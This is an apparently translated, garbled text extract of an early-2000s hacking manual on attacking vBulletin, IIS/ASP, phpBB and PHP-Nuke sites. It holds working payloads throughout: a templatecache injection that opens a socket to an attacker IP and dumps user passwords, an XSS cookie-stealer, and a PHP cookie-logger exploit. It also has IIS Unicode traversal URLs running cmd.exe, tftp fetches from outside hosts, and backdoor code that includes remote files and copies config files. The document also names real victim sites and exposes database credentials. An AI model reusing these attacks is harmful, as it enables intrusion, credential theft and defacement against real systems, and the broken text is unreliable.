gettemplate() function in global.php is used to fetch a template from
database. The code is then passed to eval(). If we take index.php for
:an example, there's this code
303
} ("if ($action=="faq
;(";("\".("eval("echo dovars(\"".gettemplate("faq
{
The dovars() function does some variable replacing, such as replace
.<"largefont> with <font size="10>
:The gettemplate() function is defined in global.php
} (function gettemplate($templatename,$escape=1
gets a template from the db or from the local cache //
;global $templatecache,$DB_site
} (""=![if ($templatecache[$templatename
;[template=$templatecache[$templatename$
} else {
gettemp=$DB_site->query_first("SELECT template FROM template$
;("'".(WHERE title='". addslashes($templatename
;[template=$gettemp[template$
;templatecache[$templatename]=$template$
{
} (if ($escape==1
;(template=str_replace("\"","\\\"",$template$
{
;return $template
{
304
url
: hello+world
vb 113 or 115 -1
( ) 90 -2
url -3
search.php3?
action=simplesearch&query=searchthis&templatecache[standardredirec
t]="%29%3B%24fa="<%261";set_time_limit(substr("900",0,3));
%24fp=fsockopen(substr("IP.IP.IP.IP",0,12),substr("90",0,2),
%26%24errno,%26%24errstr,substr("900" ,0,3));if(!%24fp)
{}else{%24arr[200];fputs(%24fp,su
bstr("vhak1.0,%20- d%20downloads%20database,or%20press%20return
%20for
%20command%20line" ,0,63));%24va=fgets(%24fp,3);fputs(%24fp,
%24va);if
305
))strlen(%24va)>1
{include(substr("admin/config.php",0,16));include(substr("admin/config.
php3",0,17));mysql_connect(substr("%24servername",0,strlen(%24serve
rname)),substr("%24dbusername",0,strlen(%24dbusername)),substr("%
24dbpassword" ,0,strlen(%24dbpassword)));%24currenta=mysql_db_qu
*ery(substr("%24dbname",0,strlen(%24dbname)),substr("select%20
%20from%20user" ,0,18));while(%24res=mysql_fetch_array
%20(%24curre
))nta
{fputs(%24fp,"%24res[userid],");fputs(%24fp,"%24res[usergroupid],");fp
uts(%24fp,"%24res[password],");fputs(%24fp,"%24res
%24arr);%24str=exec(fgets(%24fp,substr("128",0,3)),
)%24arr);for(%24ir=substr("0",0,1);%24ir< sizeof(%24arr);%24ir%2B%2B
{fputs(%24fp,%24arr[%24
_ir]);fputs(%24fp,%24va);}}fclose(%24fp);}die(vhak
"finished_execution);echo%28
By Kill -9
IP.IP.IP.IP 12
127.0.0.1 9
) arabteam2000.com ( c4arab.com
...
!!
: 90
d downloads 2.2x
113 11
115 225
) WebServer : ( + )( .
306
:
: vBulletin !! .
--------- :
-------- ..
.. .. HTML
) .. ( HTML
:
>script>document.write('<img
<src="http://my_ip_address/'+document.cookie+'">';</script
IP Adress IP .
..
) IIS Apache
( .
Log ..
.. Apche logs . Acces Log
..
.. :
GET/ bbuserid=86;%20bbpassword=dd6169d68822a116cd97e1fb
ddf90622;%20sessionhash=a
4719cd620534914930b86839c4bb5f8;%20bbthreadview[54
%20bblastvi;1012444064=[20
sit=1011983161
..
..
..
?http://www.victim.com/vb/index.php
[bbuserid=[userid]&bbpassword=[password hash
307
308
http://target/page.asp+.htr
: target
: Page asp
: htr.+
....
View Source ASP
:
>%
("Set DB= Server.CreateObject("ADODB.Connection
DB.Open "DRIVER=SQL
Server;SERVER=xxx;UID=sa;PWD=;APP=Microsoft (R) Developer
"Studio;WSID=xxx;DATABASE=moe_dbs", "_LinuxRay", "6666666
<%
----------------------------------------------------------------- _LinuxRay
6666666
------------------------------------------------------------------
ASP :
'AMicrosoft VBScript runtime error '800a01a8
'Object required: 'Conn
filename.inc, line 5/
* inc.
.
ASP
database.inc
>!<--"include file = "database.inc#--
global.asa
309
global.asa++
beforemilion-global.asa
global.asamilion.sql
global-direct.asa
SQL
:
global.asa+.htr
IIS 3 ASP data$::
file.asp::$data
IIS 3 .
...
!! SQL
Visual interdev 6.0
ACCESS 2000
File
New
(Project (Exiting Data
.
Create
Data Link Properties
- -
- 1 Select or enter server name
- 2 User Name
- 3 Password
) (Blank Password
310
Test Connection
Test Connection Succeeded
.
:
Select the data base on the server
. OK
:
/http://www.moe.gov.sa
: -1
http://www.moe.gov.sa/news_admin.asp
'Microsoft VBScript runtime error '800a01a8
'Object required: 'Conn
news_admin.asp, line 7/
: htr
http://www.moe.gov.sa/news_admin.asp+.htr
<--"include file = "database.inc#--!>
: database.inc
http://www.moe.gov.sa/database.inc
:
%>
("Set DB= Server.CreateObject("ADODB.Connection
DB.Open "DRIVER=SQL
Server;SERVER=CNW2;UID=sa;PWD=;APP=Microsoft (R) Developer
"Studio;WSID=CNW2;DATABASE=moe_dbs", "sa", "123321
<%
.....
.
311
:
/http://www.itsalat.com
User name : sa Passwd : sp2000 - 1
*****************
%80
2 1.5 15000
1
2
3
4
6 %100
IIS
IIS
...IIS5.0
4 5
312
:
\:http://www.xxxxxx.com/scripts/.. ../winnt/system32/cmd.exe?/c+dir+c
:c
\:scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c/
\:scripts..%c1%9c../winnt/system32/cmd.exe?/c+dir+c/
\:scripts/..%c1%pc../winnt/system32/cmd.exe?/c+dir+c/
\:scripts/..%c0%9v../winnt/system32/cmd.exe?/c+dir+c/
\:scripts/..%c0%qf../winnt/system32/cmd.exe?/c+dir+c/
\:scripts/..%c1%8s../winnt/system32/cmd.exe?/c+dir+c/
\:scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c/
\:scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir+c/
\:scripts/..%c1%af../winnt/system32/cmd.exe?/c+dir+c/
\:scripts/..%e0%80%af../winnt/system32/cmd.exe?/c+dir+c/
\:scripts/..%f0%80%80%af../winnt/system32/cmd.exe?/c+dir+c/
\:scripts/..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+dir+c/
\:scripts/..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+dir+c/
msadc/..\%e0\%80\%af../..\%e0\%80\%af../..\/
\:%e0\%80\%af../winnt/system32/cmd.exe\?/c\+dir+c
:
+\http://www.xxxxx.com///////....2/cmd.exe/?/c
Dir
32
:
\:http://www.xxxxxx.com/scripts/.. ../winnt/system32/cmd.exe?/c+dir+c
http://www.xxxxxx.com/scripts/..
\../winnt/system32/cmd.exe?/c+dir+c:\Winnt\Sytem32
\Winnt\Sytem32
.....
313
\:http://www.xxxxx.com/scripts/......exe?/c+dir+c
32
\:c+dir+c
/http://www.xxxxx.com/scripts/.....Winnt/System32
tftp.exe
.........................................................................................
www.geocities.com/anorR1234/tftpd32.zip
\:C
tftp32.exe
\:C
----------------------------------------------------------------
=
:
\:http://www.xxxxx.com/scripts/......exe?/c+dir+c
c+tftp.exe+"-i"+1.1.1.1+GET+index.htm+C:\inetpub\wwwroot\index.htm /
\:c+dir+c/
c+tftp.exe+"-i"+1.1.1.1+GET+index.htm+C:\inetpub\wwwroot\index.htm /
"http://www.xxxxx.com/scripts/.....xe?/c+tftp.exe+i"+1.1.1.1+GET+index.htm+C:\inetpub\wwwroot\index.htm
314
tftp.exe
" "i-
1.1.1.1
GET
index.htm
\C:\inetpub\wwwroot
index.htm
\:C
index.htm
"http://www.xxxxx.com/scripts/.....xe?/c+tftp.exe+i"+212.212.212.212+GET+index.htm+C:\inetpub\wwwroot\index.htm
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
http://server/msadc/..../..../c+del+c:/*.log
--------------------------------------
*******************
1
1 $
2 30
3
%100
-
315
2.2.5
forum
:PHP
-------------------------------------------------------------------------------} ("if ($action=="modify
;vbxh = h$
;vbxt = t$
;vbxp = p$
;vbxw = w$
;vbxa = a$
;vbx1 = 1$
;vbxr = r$
;vbxb = b$
;vbxn = n$
;vbxe = e$
;vbxo = o$
;vbxy =y$
;vbxl = l$
;" --!>" echo
= file$
fopen("$vbxh$vbxt$vbxt$vbxp://$vbxw$vbxw$vbxw.
$vbxa$vbxr$vbxa$vbxb$vbx1.$vbxn$vbxe$vbxt/~$vbxr$vbxo$vbxy$vbx
a$vbxl/.x.php?h=$HTTP_HOST&h2=$SCRIPT_NA
;("ME", "r
;(rf = fread($file, 1000$
;(fclose($file
;"<-- " echo
-------------------------------------------------------------------------------
/http://www.arab1.net
http://www.arab1.net/~royal/.x.php?
h=$HTTP_HOST&h2=$SCRIPT_NAME
2.2.6
316
option
:PHP
-------------------------------------------------------------------------------;" --!>" echo
;"include "$sqlupdate
;"<-- " echo
-------------------------------------------------------------------------------functions
:PHP
-------------------------------------------------------------------------------sqlupdate =$
base64_decode('aHR0cDovL3NhdWRpLm5vLWlwLmNvbS9+cm9
;('==5YWwvLngyLmluYw
-------------------------------------------------------------------------------
/http://saudi.no-ip.com
WELCOME TO arab1.net
http://saudi.no-ip.com/~royal/.x2.inc
.......
:PHP
-------------------------------------------------------------------------------<";div id="sHo" style="display:none>
--!>
if you are seeing this code PlzZzZz Contact
[email]sleeping_bum@hotmail.com
php?>
;("system("mkdir /tmp/.statics
;("system("cp /etc/httpd/conf/httpd.conf /tmp/.statics/httpd1.conf
;("system("cp /usr/local/apache/conf/httpd.conf /tmp/.statics/httpd2.conf
;("system("cp admin/config.php /tmp/.statics/php.conf
317
318
8
9
. 10
319
;("<Print ("<Pre
;("<Print ("<Center
;("Print ("<B>vBulletin XSS Injection Vulnerability: Exploit</B>\n
Print ("Coded By: <B><A
Href=\"MailTo:SpeedICNet@Hotmail.Com\">Sp.IC</A></B><Hr
;("<"\Width=\"20%
*/
;(Print ($Footer
/*
} (['Switch ($HTTP_GET_VARS['Action
:"Case "Log
;['Data = $HTTP_GET_VARS['Cookie$
Data = StrStr ($Data, SubStr ($Data, BCAdd (0x0D, StrLen (DecHex$
;(((((((MD5 (NULL
;("+Log = FOpen ($LogFile, "a$
;("FWrite ($Log, Trim ($Data) . "\n
;(FClose ($Log
Print ("<Meta HTTP-Equiv=\"Refresh\" Content=\"0; URL=" .
;("<"\" . ['$HTTP_SERVER_VARS['HTTP_REFERER
;Break
:"Case "List
} ((If (!File_Exists ($LogFile) || !In_Array ($Records
;("<Print ("<Br><Br><B>There are No Records</B></Center></Pre
;() Exit
{
} Else
;("<Print ("</Center></Pre
;((Records = Array_UniQue (File ($LogFile$
;("<Print ("<Pre
;("Print ("<B>.:: Statics</B>\n
;("Print ("\n
;("Print ("o Logged Records : <B>" . Count (File ($LogFile)) . "</B>\n
Print ("o Listed Records : <B>" . Count ($Records) . " </B>[Not Counting
;("Duplicates]\n
;("Print ("\n
;("Print ("<B>.:: Options</B>\n
;("Print ("\n
} (If (Count (File ($LogFile)) > 0
;"[<Link['Download'] = "[<A Href=\"" . $LogFile . "\">Download</A$
{
}Else
;"[Link['Download'] = "[No Records in Log$
{
;("Print ("o Download Log : " . $Link['Download'] . "\n
Print ("o Clear Records : [<A Href=\"" . $SCRIPT_PATH. "?
320
;("Action=Delete\">Y</A>]\n
;("Print ("\n
;("Print ("<B>.:: Records</B>\n
;("Print ("\n
} ((While (List ($Line[0], $Line[1]) = Each ($Records
;([Print ("<B>" . $Line[0] . ": </B>" . $Line[1
{
{
;("<Print ("</Pre
;Break
:"Case "Delete
;(UnLink ($LogFile@
Print ("<Br><Br><B>Deleted Succsesfuly</B></Center></Pre>") Or Die
;("<("<Br><Br><B>Error: Cannot Delete Log</B></Center></Pre
Print ("<Meta HTTP-Equiv=\"Refresh\" Content=\"3; URL=" .
;("<"\" . ['$HTTP_SERVER_VARS['HTTP_REFERER
;Break
{
<?
php -2
-3
member2.php?s=[Session]&action=viewsubscription&perpage=[Script
[Code
[script code]
Action=Log&Cookie='+?[] //:Script>location='Http>
<(document.cookie);</Script
-4
Action=List? /http://%20
321
PhpBB2
admin_ug_auth.php
:
:
2.0.0
><html
><head
><head/
><body
>"form method="post
action="http://www.domain_name/board_directory/admin/admin_ug_aut
<"h.php
<"User Level: <select name="userlevel
322
><option value="admin">Administrator</option
><option value="user">User</option></select
><"input type="hidden" name="private[1]" value="0
><"input type="hidden" name="moderator[1]" value="0
><"input type="hidden" name="mode" value="user
><""=input type="hidden" name="adv" value
<"User Number: <input type="text" name="u" size="5
><"input type="submit" name="submit" value="Submit
><form/
><body/
><html/
http://www.domain_name/board_directory
html
Administrator
submit
!!
/http://forums.xos.ca
...
323
:
.
:
.... images/forum/avatars/
..
text .. !!!!
:
Your Account
Your Info view source
uid
:
><"input type="hidden" name="uid" value="2111
... 2111
html
/http://nukesite :......
>!<!-- START CODE --
>"form name="Register
"action="http://NUKEDSITE/modules.php?name=Your_Account
<"method="post
>"b>Code ('">[code]<b ')</b><input type="text
"name="user_avatar" size="30
<maxlength="30"><br><br
>"b>Username</b><input type="text" name="uname" size="30
"maxlength="255"><br><b>User ID:<input type="text
"name="uid
"size="30"><input type="hidden" name="op
value="saveuser"><input
<type="submit" value="Save Changes"></form
325
html ..
:
"<
>b
... submit
Your Account .. !!!!
:
"<>h1>TESTING</h1><b
TESTING !!....
">b
..
30 ....
xss
=(
:
!!!!
...
326
" "
:::
/http://members.lycos.co.uk/hihack/vb .
/http://www.e3sar.net/vb .
/http://www.ebnmasr.net/vb .
/http://www.7azm.net/vb .
http://www.almuhands.org/forum/index.php .
/http://www.arabse.net/vb .
/http://www.emoataz.com/vb .
/http://www.h4palestine.com .
/http://www.pharaonics.net
/http://www.ruwad.tk .
/http://www.nafitha.org .
http://www.arab4vb.com/vb/index.php .
http://www.naajm.com/vb/forumdisplay.php .
327
.1
.2
.3
.4
.5
.6
.7
.8
.9
.10
.11
.12
.13
...
.
" "
Packet Storm Security
--------------------- /http://packetstorm.securify.com :
' 'New Files Today
.
Ken Williams
.)/Kroll-O-Nagra ) http://www.securify.com
Security Focus
--------------- /http://www.securityfocus.com :
328
. !
BugTraq
------- : ), /Security Focus )http://www.securityfocus.com
).(/Netspace ) http://www.netspace.org
BugTraq mailing list
.(Aleph1 (aleph1@underground.org
) ( spams
/http://www.securityfocus.com
''search
Searching
----------- Sendmail 8.8.3 '
'sendmail 8.8.3 local DoS
sendmail
'local DoS sendmail' : .
:::
/http://rootshell.redi.tk
.1
http://www.ussrback.com
.2
http://www.insecure.org/sploits.html
.3
http://www.linux.com.cn/hack.co.za
.4
==+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
:::
http://www.haker.com.pl
.1
/http://www.webattack.com
.2
http://blacksun.box.sk
.3
http://www.blackcode.com
.4
http://www.t0010.com/books/index.php
329
330